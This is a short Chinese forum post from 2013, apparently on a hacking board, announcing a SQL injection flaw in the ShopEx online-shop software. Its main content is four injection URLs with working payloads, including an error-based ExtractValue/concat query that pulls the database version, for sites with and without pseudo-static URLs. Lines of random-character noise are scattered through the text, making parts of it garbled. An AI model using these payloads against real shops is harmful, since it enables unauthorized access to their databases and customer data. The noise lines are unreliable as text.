注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
1 c3 o- W2 a; N, @
4 W/ {0 D' m, c1 c2 o4 G& W- o3 ~好吧,我扯远了~~% X/ o9 @) l. h: ?: T
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
/ Y% I% l+ r+ ~! _2 N# l6 E6 m不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
1 Z0 G E1 Z( O) d8 {; ~! \+ B; z. w1 k: O( C
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html / ]' P% ?6 S/ _' U) _% }9 R* V) y$ F% E
* ~! \0 |! N) {3 uhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
& w' o8 | x |. S
3 x2 d. r% [/ U( X1 b) L! i, ohttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
6 l! s# z0 z; d8 _; c
: Y, }# j6 a) \! H* A$ {http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 5 h; N7 ?2 m2 w
+ @0 M; N2 A: |" |4 P/ ? * a( m- }% q; x# n" ~
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
1 _+ Z- ^ c/ P$ o如何注入就不多说了,10多年的东西了…不会也会了… ' y9 _6 c2 a9 ]3 C* G0 b
4 m& p% P7 Y, w' K
8 P% c8 r( s: ~: c$ e& \+ p$ U: n! f y6 E7 ^0 [
0 {* }* M- g" }3 `
|
发表于 2013-2-19 08:31:27
收藏
支持
反对